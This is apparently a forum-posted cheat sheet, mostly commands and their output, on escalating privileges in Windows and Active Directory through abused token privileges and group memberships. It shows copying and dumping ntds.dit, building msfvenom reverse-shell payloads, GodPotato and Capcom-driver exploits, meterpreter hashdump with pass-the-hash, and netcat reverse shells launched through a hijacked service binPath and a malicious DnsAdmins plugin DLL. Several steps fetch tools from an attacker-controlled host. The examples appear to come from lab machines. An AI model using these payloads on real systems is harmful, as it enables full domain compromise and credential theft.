- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
SeBackupPrivilege
| 1 2 3 4 5 6 7 8 9 10 | Evil-WinRM PS C:\Users\Caroline.Robinson\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= ... SeBackupPrivilege Back up files and directories Enabled ... |
Disk Shadow method
| 1 2 3 4 | set context persistent nowriters add volume c: alias pwn create expose %pwn% z: |
| 1 | Evil-WinRM PS C:\temp> upload pwn.txt |
| 1 2 3 4 5 | Evil-WinRM PS C:\temp> type pwn.txt set context persistent nowriters add volume c: alias pwn create expose %pwn% z: |
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | Evil-WinRM PS C:\temp> diskshadow /s pwn.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: BABYDC, 8/9/2024 10:57:34 PM -> set context persistent nowriters -> add volume c: alias pwn -> create Alias pwn for shadow ID {041d93f3-797d-4f91-a270-5c1fb66092e6} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c} set as environment variable. Querying all shadow copies with the shadow copy set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c} * Shadow copy ID = {041d93f3-797d-4f91-a270-5c1fb66092e6} %pwn% - Shadow copy set: {7df9215a-2efb-4a28-befe-cbaf15deba8c} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\] - Creation time: 8/9/2024 10:57:36 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: BabyDC.baby.vl - Service machine: BabyDC.baby.vl - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %pwn% z: -> %pwn% = {041d93f3-797d-4f91-a270-5c1fb66092e6} The shadow copy was successfully exposed as z:\. -> |
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | Evil-WinRM PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Friday, August 9, 2024 10:57:58 PM Source : z:\windows\ntds\ Dest : C:\temp\ Files : ntds.dit Options : /DCOPY  A /COPYAT /B /R:1000000 /W:30------------------------------------------------------------------------------ 1 z:\windows\ntds\ New File 16.0 m ntds.dit [snipped] |
| 1 2 | Evil-WinRM PS C:\temp> reg save HKLM\SYSTEM c:\temp\system The operation completed successfully. |
| 1 2 3 4 5 | Evil-WinRM PS C:\temp> download system Info: Downloading C:\temp\system to system Info: Download successful! |
| 1 2 3 4 5 | Evil-WinRM PS C:\temp> download ntds.dit Info: Downloading C:\temp\ntds.dit to ntds.dit Info: Download successful! |
| 1 | ➜ secretsdump.py -system system -ntds ntds.dit local |
SeLoadDriverPrivilege
-> Для просмотра ссылки Войди| 1 | ➜ msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o shell.exe |
| 1 2 3 4 | Evil-WinRM PS C:\temp> upload Capcom.sys Evil-WinRM PS C:\temp> upload ExploitCapcom.exe Evil-WinRM PS C:\temp> upload eoploaddriver_x64.exe Evil-WinRM PS C:\temp> upload shell.exe |
| 1 | Evil-WinRM PS C:\temp> .\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\temp\Capcom.sys |
| 1 | Evil-WinRM PS C:\temp> .\ExploitCapcom.exe LOAD \temp\Capcom.sys |
| 1 | Evil-WinRM PS C:\temp> .\ExploitCapcom.exe EXPLOIT .\shell.exe |
SeImpersonatePrivilege
| 1 2 3 4 5 6 7 8 9 10 | C:\Windows\system32>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== ... SeImpersonatePrivilege Impersonate a client after authentication Enabled ... |
| 1 | PS C:\programdata> iwr http://<tun0>/GodPotato-NET4.exe -outfile gp.exe |
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | PS C:\programdata> .\gp.exe -cmd "C:\Users\Public\nc64.exe -e cmd.exe <tun0> <port>" [*] CombaseModule: 0x140733127524352 [*] DispatchTable: 0x140733130111304 [*] UseProtseqFunction: 0x140733129406688 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] CreateNamedPipe \\.\pipe\eb27b3cc-7b5a-420d-8f01-d3094f6ee323\pipe\epmapper [*] Trigger RPCSS [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00000402-0d08-ffff-8e84-859d1b28d501 [*] DCOM obj OXID: 0xd402854b19147ceb [*] DCOM obj OID: 0x20ef4be3bfc76a84 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 892 Token:0x496 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 3040 |
| 1 2 3 4 5 6 7 8 | ➜ nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.150.182] 54910 Microsoft Windows [Version 10.0.20348.2340] (c) Microsoft Corporation. All rights reserved. C:\programdata>whoami nt authority\system |
SeDebugPrivilege
| 1 | msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f exe LHOST=<ip> LPORT=<port> -o shell.exe |
| 1 2 | PS C:\temp> iwr http://<ip>/shell.exe -outfile shell.exe PS C:\temp> .\shell.exe |
| 1 2 3 4 5 6 7 8 9 10 | msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost tun0 msf6 exploit(multi/handler) > set lport 443 msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on <attacker_ip>:<port> [*] Sending stage (200774 bytes) to <target_ip> [*] Meterpreter session 1 opened [SNIP] |
| 1 | meterpreter > hashdump |
| 1 | meterpreter > portfwd add -L 127.0.0.1 -l 445 -p 445 -r <target_ip> |
| 1 | impacket-smbexec administrator@127.0.0.1 -hashes :<hash> |
SeTcbPrivilege
| 1 2 3 4 5 6 7 8 9 10 | Evil-WinRM PS C:\Users\svc_deploy\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= ... SeTcbPrivilege Act as part of the operating system Enabled ... |
| 1 | Evil-WinRM PS C:\Users\svc_deploy\Documents> iwr http://<tun0>/TcbElevation.exe -outfile TcbElevation.exe |
| 1 | Evil-WinRM PS C:\Users\svc_deploy\Documents> upload rcat_10.8.0.210_443.exe |
| 1 2 | Evil-WinRM PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe pwn "C:\Windows\system32\cmd.exe /c C:\Users\svc_deploy\Documents\rcat_10.8.0.210_443.exe" Error starting service 1053 |
| 1 2 3 4 5 6 7 8 | ➜ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.153.117] 53924 Microsoft Windows [Version 10.0.20348.2113] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system |
Groups
Server Operators Group
Its members can sign-in to a server, start and stop services, access domain controllers, perform maintenance tasks (such as backup and restore), and they have the ability to change binaries that are installed on the domain controllers.| 1 2 3 4 5 | Evil-WinRM PS C:\temp> net user svc-printer ... Local Group Memberships *Print Operators *Remote Management Use *Server Operators Global Group memberships *Domain Users |
| 1 | Evil-WinRM PS C:\temp> upload nc64.exe |
| 1 2 | Evil-WinRM PS C:\temp> sc.exe config VMTools binPath="C:\temp\nc64.exe -e powershell.exe <tun0> <port>" [SC] ChangeServiceConfig SUCCESS |
| 1 2 3 4 5 6 7 8 9 | Evil-WinRM PS C:\temp> sc.exe stop VMTools SERVICE_NAME: VMTools TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 |
| 1 | Evil-WinRM PS C:\temp> sc.exe start VMTools |
| 1 2 3 4 5 6 7 8 | ➜ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.14.30] from (UNKNOWN) [10.10.11.108] 49634 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami nt authority\system |
DnsAdmins Group
-> Для просмотра ссылки ВойдиWhen we are member of this group we can ask the machine to load an arbitrary DLL file when the service starts so that gives us RCE as SYSTEM. We can re-configure the service and we have the required privileges to restart it.
| 1 | ➜ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o shell.dll |
| 1 | Evil-WinRM PS C:\temp> upload shell.dll |
| 1 2 3 4 | Evil-WinRM PS C:\temp> cmd /c 'dnscmd <DC> /config /serverlevelplugindll C:\temp\shell.dll' Registry property serverlevelplugindll successfully reset. Command completed successfully. |
| 1 2 3 4 5 6 7 8 9 10 | Evil-WinRM PS C:\temp> sc.exe \\<DC> stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 |
| 1 2 3 4 5 6 7 8 9 10 11 12 | Evil-WinRM PS C:\temp> sc.exe \\<DC> start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 3500 FLAGS |
| 1 2 3 4 5 | ➜ rlwrap nc -nlvp 9001 ... PS C:\Windows\system32> whoami nt authority\system |
Resources
- Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся - Для просмотра ссылки Войди
или Зарегистрируйся
Для просмотра ссылки Войди